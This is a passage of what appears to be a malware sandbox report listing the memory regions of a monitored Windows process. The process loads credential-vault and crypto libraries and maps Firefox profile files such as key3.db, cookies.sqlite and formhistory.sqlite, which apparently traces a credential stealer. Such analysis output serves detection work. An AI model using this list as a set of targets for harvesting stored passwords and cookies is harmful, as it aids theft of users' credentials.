= 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 4133 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 4134 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 4135 start_va = 0x75320000 end_va = 0x75325fff entry_point = 0x75320000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll") Region: id = 4170 start_va = 0x75300000 end_va = 0x7530ffff entry_point = 0x75300000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 4171 start_va = 0x2cb0000 end_va = 0x2dbffff entry_point = 0x0 region_type = private name = "private_0x0000000002cb0000" filename = "" Region: id = 4172 start_va = 0x2dc0000 end_va = 0x2ecffff entry_point = 0x0 region_type = private name = "private_0x0000000002dc0000" filename = "" Region: id = 4173 start_va = 0x2ed0000 end_va = 0x308ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ed0000" filename = "" Region: id = 4183 start_va = 0x2620000 end_va = 0x265ffff entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 4184 start_va = 0x2bc0000 end_va = 0x2bfffff entry_point = 0x0 region_type = private name = "private_0x0000000002bc0000" filename = "" Region: id = 4185 start_va = 0x7ef95000 end_va = 0x7ef97fff entry_point = 0x0 region_type = private name = "private_0x000000007ef95000" filename = "" Region: id = 4186 start_va = 0x75310000 end_va = 0x75315fff entry_point = 0x75310000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 4226 start_va = 0x2ad0000 end_va = 0x2b0ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 4227 start_va = 0x2de0000 end_va = 0x2e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002de0000" filename = "" Region: id = 4228 start_va = 0x2ec0000 end_va = 0x2ecffff entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 4229 start_va = 0x752f0000 end_va = 0x752fffff entry_point = 0x752f0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\SysWOW64\\NapiNSP.dll" (normalized: "c:\\windows\\syswow64\\napinsp.dll") Region: id = 4230 start_va = 0x7ef92000 end_va = 0x7ef94fff entry_point = 0x0 region_type = private name = "private_0x000000007ef92000" filename = "" Region: id = 4231 start_va = 0x752d0000 end_va = 0x752e1fff entry_point = 0x752d0000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\SysWOW64\\pnrpnsp.dll" (normalized: "c:\\windows\\syswow64\\pnrpnsp.dll") Region: id = 4232 start_va = 0x75290000 end_va = 0x752cbfff entry_point = 0x75290000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 4233 start_va = 0x75280000 end_va = 0x75287fff entry_point = 0x75280000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\SysWOW64\\winrnr.dll" (normalized: "c:\\windows\\syswow64\\winrnr.dll") Region: id = 4234 start_va = 0x75270000 end_va = 0x75274fff entry_point = 0x75270000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 4235 start_va = 0x75260000 end_va = 0x75265fff entry_point = 0x75260000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 4236 start_va = 0x75220000 end_va = 0x75257fff entry_point = 0x75220000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 4237 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4238 start_va = 0x3080000 end_va = 0x30bffff entry_point = 0x0 region_type = private name = "private_0x0000000003080000" filename = "" Region: id = 4239 start_va = 0x75210000 end_va = 0x75218fff entry_point = 0x75210000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 4240 start_va = 0x30c0000 end_va = 0x3402fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030c0000" filename = "" Region: id = 4241 start_va = 0x2d20000 end_va = 0x2d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d20000" filename = "" Region: id = 4242 start_va = 0x2db0000 end_va = 0x2dbffff entry_point = 0x0 region_type = private name = "private_0x0000000002db0000" filename = "" Region: id = 4243 start_va = 0x2e40000 end_va = 0x2e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e40000" filename = "" Region: id = 4244 start_va = 0x7ef8f000 end_va = 0x7ef91fff entry_point = 0x0 region_type = private name = "private_0x000000007ef8f000" filename = "" Region: id = 4245 start_va = 0x75200000 end_va = 0x75207fff entry_point = 0x75200000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 4246 start_va = 0x751c0000 end_va = 0x751f7fff entry_point = 0x751c0000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 4247 start_va = 0x751a0000 end_va = 0x751b6fff entry_point = 0x751a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 4248 start_va = 0x75160000 end_va = 0x7519cfff entry_point = 0x75160000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4249 start_va = 0x75140000 end_va = 0x75155fff entry_point = 0x75140000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\SysWOW64\\gpapi.dll" (normalized: "c:\\windows\\syswow64\\gpapi.dll") Region: id = 4250 start_va = 0x75120000 end_va = 0x7513bfff entry_point = 0x75120000 region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\SysWOW64\\cryptnet.dll" (normalized: "c:\\windows\\syswow64\\cryptnet.dll") Region: id = 4251 start_va = 0x763d0000 end_va = 0x7656cfff entry_point = 0x763d0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 4252 start_va = 0x75890000 end_va = 0x758b6fff entry_point = 0x75890000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 4253 start_va = 0x75870000 end_va = 0x75881fff entry_point = 0x75870000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 4254 start_va = 0x75100000 end_va = 0x75114fff entry_point = 0x75100000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\SysWOW64\\cabinet.dll" (normalized: "c:\\windows\\syswow64\\cabinet.dll") Region: id = 4255 start_va = 0x750f0000 end_va = 0x750fdfff entry_point = 0x750f0000 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\SysWOW64\\devrtl.dll" (normalized: "c:\\windows\\syswow64\\devrtl.dll") Region: id = 4256 start_va = 0x450000 end_va = 0x48ffff entry_point = 0x450000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat") Region: id = 4257 start_va = 0x2ed0000 end_va = 0x2fcffff entry_point = 0x0 region_type = private name = "private_0x0000000002ed0000" filename = "" Region: id = 4258 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x1c0000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 4259 start_va = 0x2c0000 end_va = 0x2d0fff entry_point = 0x2c0000 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id = 4260 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x1c0000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 4261 start_va = 0x75070000 end_va = 0x750effff entry_point = 0x75070000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4262 start_va = 0x3410000 end_va = 0x357ffff entry_point = 0x0 region_type = private name = "private_0x0000000003410000" filename = "" Region: id = 4263 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 4264 start_va = 0x76020000 end_va = 0x760a2fff entry_point = 0x76020000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 4265 start_va = 0x360000 end_va = 0x360fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 4266 start_va = 0x75060000 end_va = 0x75069fff entry_point = 0x75060000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 4267 start_va = 0x75000000 end_va = 0x7505bfff entry_point = 0x75000000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 4268 start_va = 0x2fd0000 end_va = 0x304ffff entry_point = 0x0 region_type = private name = "private_0x0000000002fd0000" filename = "" Region: id = 4269 start_va = 0x74ff0000 end_va = 0x74ffdfff entry_point = 0x74ff0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 4270 start_va = 0x2ce0000 end_va = 0x2d1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ce0000" filename = "" Region: id = 4271 start_va = 0x2d70000 end_va = 0x2daffff entry_point = 0x0 region_type = private name = "private_0x0000000002d70000" filename = "" Region: id = 4272 start_va = 0x74fe0000 end_va = 0x74feefff entry_point = 0x74fe0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 4273 start_va = 0x7ef8c000 end_va = 0x7ef8efff entry_point = 0x0 region_type = private name = "private_0x000000007ef8c000" filename = "" Region: id = 4274 start_va = 0x74f40000 end_va = 0x74fd5fff entry_point = 0x74f40000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 4275 start_va = 0x74f20000 end_va = 0x74f37fff entry_point = 0x74f20000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\SysWOW64\\ntdsapi.dll" (normalized: "c:\\windows\\syswow64\\ntdsapi.dll") Region: id = 4276 start_va = 0x370000 end_va = 0x370fff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4277 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4453 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4455 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4457 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4459 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4461 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4463 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4465 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4467 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4469 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4634 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4636 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4638 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4640 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4642 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4650 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4652 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4654 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4656 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4658 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4660 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4662 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4664 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4666 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4668 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4670 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4672 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4674 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4676 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4678 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4680 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4682 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4684 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4686 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4688 start_va = 0x370000 end_va = 0x37afff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4834 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4836 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4838 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4840 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4842 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4844 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4846 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4848 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4850 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4852 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4854 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4856 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4858 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4860 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4862 start_va = 0x370000 end_va = 0x37bfff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4864 start_va = 0x370000 end_va = 0x37afff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4866 start_va = 0x370000 end_va = 0x37afff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4868 start_va = 0x370000 end_va = 0x37afff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4870 start_va = 0x370000 end_va = 0x37afff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4872 start_va = 0x370000 end_va = 0x37afff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4874 start_va = 0x370000 end_va = 0x37afff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4876 start_va = 0x370000 end_va = 0x37afff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4878 start_va = 0x370000 end_va = 0x37afff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4880 start_va = 0x370000 end_va = 0x37afff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4882 start_va = 0x3410000 end_va = 0x350ffff entry_point = 0x0 region_type = private name = "private_0x0000000003410000" filename = "" Region: id = 4883 start_va = 0x3540000 end_va = 0x357ffff entry_point = 0x0 region_type = private name = "private_0x0000000003540000" filename = "" Region: id = 4884 start_va = 0x370000 end_va = 0x384fff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 4885 start_va = 0x74f10000 end_va = 0x74f1cfff entry_point = 0x74f10000 region_type = mapped_file name = "pstorec.dll" filename = "\\Windows\\SysWOW64\\pstorec.dll" (normalized: "c:\\windows\\syswow64\\pstorec.dll") Region: id = 4886 start_va = 0x74ef0000 end_va = 0x74f03fff entry_point = 0x74ef0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll") Region: id = 4887 start_va = 0x490000 end_va = 0x49afff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 4889 start_va = 0x490000 end_va = 0x49afff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 4891 start_va = 0x73800000 end_va = 0x7427ffff entry_point = 0x73800000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll") Region: id = 4892 start_va = 0x74ee0000 end_va = 0x74f1bfff entry_point = 0x74ee0000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 4893 start_va = 0x490000 end_va = 0x490fff entry_point = 0x490000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 4894 start_va = 0x4b0000 end_va = 0x4b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 4895 start_va = 0x74eb0000 end_va = 0x74eddfff entry_point = 0x74eb0000 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll") Region: id = 4896 start_va = 0x74ea0000 end_va = 0x74eabfff entry_point = 0x74ea0000 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\SysWOW64\\vaultcli.dll" (normalized: "c:\\windows\\syswow64\\vaultcli.dll") Region: id = 4897 start_va = 0x3580000 end_va = 0x3680fff entry_point = 0x0 region_type = private name = "private_0x0000000003580000" filename = "" Region: id = 4898 start_va = 0x3580000 end_va = 0x3680fff entry_point = 0x0 region_type = private name = "private_0x0000000003580000" filename = "" Region: id = 4899 start_va = 0x3580000 end_va = 0x3680fff entry_point = 0x0 region_type = private name = "private_0x0000000003580000" filename = "" Region: id = 4900 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "addons.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json") Region: id = 4901 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "bookmarks-2017-06-30_5.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json") Region: id = 4902 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "bookmarks-2017-07-26_5.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json") Region: id = 4903 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x450000 region_type = mapped_file name = "cert8.db" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db") Region: id = 4904 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "compatibility.ini" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini") Region: id = 4905 start_va = 0x450000 end_va = 0x487fff entry_point = 0x450000 region_type = mapped_file name = "content-prefs.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite") Region: id = 4906 start_va = 0x2c00000 end_va = 0x2c7ffff entry_point = 0x2c00000 region_type = mapped_file name = "cookies.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite") Region: id = 4907 start_va = 0x450000 end_va = 0x467fff entry_point = 0x450000 region_type = mapped_file name = "downloads.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite") Region: id = 4908 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "extensions.ini" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini") Region: id = 4909 start_va = 0x2c00000 end_va = 0x2c6ffff entry_point = 0x2c00000 region_type = mapped_file name = "extensions.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite") Region: id = 4910 start_va = 0x450000 end_va = 0x47ffff entry_point = 0x450000 region_type = mapped_file name = "formhistory.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite") Region: id = 4911 start_va = 0x3580000 end_va = 0x3697fff entry_point = 0x3580000 region_type = mapped_file name = "healthreport.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite") Region: id = 4912 start_va = 0x450000 end_va = 0x45afff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 4913 start_va = 0x3580000 end_va = 0x37d7fff entry_point = 0x3580000 region_type = mapped_file name = "818200132aebmoouht.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") Region: id = 4914 start_va = 0x450000 end_va = 0x453fff entry_point = 0x450000 region_type = mapped_file name = "key3.db" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db") Region: id = 4915 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "localstore.rdf" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf") Region: id = 4917 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "marionette.log" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log") Region: id = 4918 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "mimetypes.rdf" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf") Region: id = 4919 start_va = 0x450000 end_va = 